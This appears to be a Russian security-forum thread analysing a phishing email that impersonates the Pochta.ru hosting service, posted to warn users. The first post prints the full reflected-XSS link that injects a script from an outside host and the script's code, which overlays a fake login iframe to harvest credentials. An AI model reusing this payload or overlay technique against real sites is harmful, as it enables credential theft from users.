Показано с 1 по 4 из 4.

Высококачественный фишинг "от Почта.ру"

  1. #1
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.09.2006
    Сообщений
    5,658
    Вес репутации
    1838

    Высококачественный фишинг "от Почта.ру"

    Некоторые участники, вероятно, знают о том, что я владею несколькими небольшими сайтами на бесплатном хостинге "Новая Почта", который определенное время назад был передан во владение ресурсу "Почта.ру" (pochta.ru). Один из них - сайт бесплатного программного обеспечения.

    Сегодня утром мне было доставлено письмо, пришедшее на почтовый адрес вышеупомянутого сайта.

    От: Администрация Почта.ру [[email protected]]
    Кому: freewarenewmail.ru
    Тема: Внимание! Ваш сайт запрещен к индексации
    Тело письма пришло в искаженной кодировке (что настораживает), поэтому я не могу его процитировать. Вероятно, для корректного чтения его нужно отобразить в виде HTML, чего я делать не собираюсь. С содержимым письма я ознакомился через мобильный браузер, где HTML можно не опасаться; в письме говорилось, что ввиду значительного количества недоброкачественных сайтов поисковые машины Интернета блокировали индексацию сайтов на хостинге Почта.ру, и желающие должны вручную заполнить на сайте компании заявление на возобновление индексации. Ниже приведена ссылка, которая в HTML выглядит как

    Код:
    http://www.nm.ru/users...
    Настоящее содержимое ссылки выглядит так:

    Код:
    http://www.nm.ru/users/reg.dhtml?__post=1&login=%EF%E0%EC%20%EF%E0%EC%20%EF%E0%ECa%5C%22%3E%3Cscript%20src=%22http://fansipanadventure.net/q.js%22%3E%3C/script%3E
    Если ссылка сработает так, как задумал автор, то на исполнение будет запущен файл fansipanadventure.net/q.js.

    Я давно не практикую как лечащий консультант регулярно, но время от времени мне интересно вспомнить некоторые старые навыки, и я отправился изучать данный файл.

    Файл состоит из пары-тройки строк:

    Код:
    document.write("<div style='position: absolute; left: 0px; top: 0px; width:100%; height:100%; z-index:15; background-color:white' scrolling=no><iframe src='http://www.dprd-jayapurakota.go.id/files/index.htm' style='width:100%; height:100%;border-color=white;border:none;' border=0></frame></div>")
    Кроме тэгов оформления, в нем есть только любимый всеми нами iframe, отправляющий нас к файлу

    Код:
    dprd-jayapurakota.go.id/files/index.htm
    Этот файл, в свою очередь, представляет собой поддельную заглавную страницу Pochta.ru. Она в два раза короче настоящей (18 кб против 32 кб), так что разница очевидна. В блоке для ввода имени и пароля написано:

    Произошла потеря сеанса. Для продолжения работы
    необходимо войти в систему.
    Все ссылки на странице, включая ссылку для восстановления пароля, абсолютные, т.е. ведут на настоящий сайт Pochta.ru. В самом блоке для имени и пароля ссылка для передачи данных относительная - login.php (то есть, видимо, dprd-jayapurakota.go.id/files/login.php), но уже этот файл не дает мне себя скачать.

    Факт фишинга, думаю, очевиден. Соответственно, предупреждаю всех клиентов Pochta.ru: если вы получили такое письмо, ни при каких обстоятельствах не переходите по ссылке и не вводите свои учетные данные.

    Почему же я, собственно, назвал фишинг высококачественным?

    Меня приятно порадовала тщательность заполнения имени и адреса отправителя, которые создают ощущение подлинности письма. Пока я не увидел текст письма, я даже верил, что это письмо действительно от Почта.ру. Кроме того, злоумышленник озаботился знанием факта, что клиентам хостинга "Новая Почта" письма должны приходить от администрации Почта.ру, а ссылка должна указывать на сайт Новой Почты (правда, он как раз устаревший - видимо, настоящая Почта.ру не позволяла подобного трюка с внедрением скрипта).

    Помимо этого, злоумышленник пошел еще дальше в создании иллюзии подлинности - он озаботился также наличием соответствующих данных в технических сведениях об отправителе, отослав свое письмо через почтовик Pochta.ru:

    Received: from mx1.ks.pochta.ru(mx1.ks.pochta.ru [82.204.219.160])
    by node6.ks.pochta.ru with POCHTA.RU LMTP SERVER
    Так что техническая сторона фишинговой рассылки выполнена тщательно и скрупулезно. Возможно, этой рассылке даже удастся кого-нибудь обмануть.
    [I]Nick Golovko
    NCFU lecturer, information security specialist[/I]

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    22.11.2007
    Адрес
    Москва
    Сообщений
    66
    Вес репутации
    99
    Цитата Сообщение от NickGolovko Посмотреть сообщение
    В самом блоке для имени и пароля ссылка для передачи данных относительная - login.php (то есть, видимо, dprd-jayapurakota.go.id/files/login.php), но уже этот файл не дает мне себя скачать.
    А смысл давать себя скачать? Простенький скрипт, который только принимает логин-пароль и ничего не отдаёт наружу.

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для senyak
    Регистрация
    05.03.2008
    Адрес
    Крым, Евпатория
    Сообщений
    1,224
    Вес репутации
    398
    Да, сделано умно и уверенно. Я б наверно купился. Мне кажется есть смысл отправить ссылку в ЛК

  5. #4
    External Specialist Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для priv8v
    Регистрация
    26.06.2008
    Сообщений
    1,373
    Вес репутации
    1263
    вся фишка заключается лишь в кривых руках админов этого сервиса (нм) - посмотрите на скрипт в ссылке - это же лол просто.

    затем фишка в гет-запросе.

Похожие темы

  1. Ответов: 7
    Последнее сообщение: 26.04.2012, 16:16
  2. Фишинг "antivirus antispyware 2011 tld" и другие
    От Denozaur в разделе Помогите!
    Ответов: 9
    Последнее сообщение: 18.04.2011, 00:08

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01380 seconds with 19 queries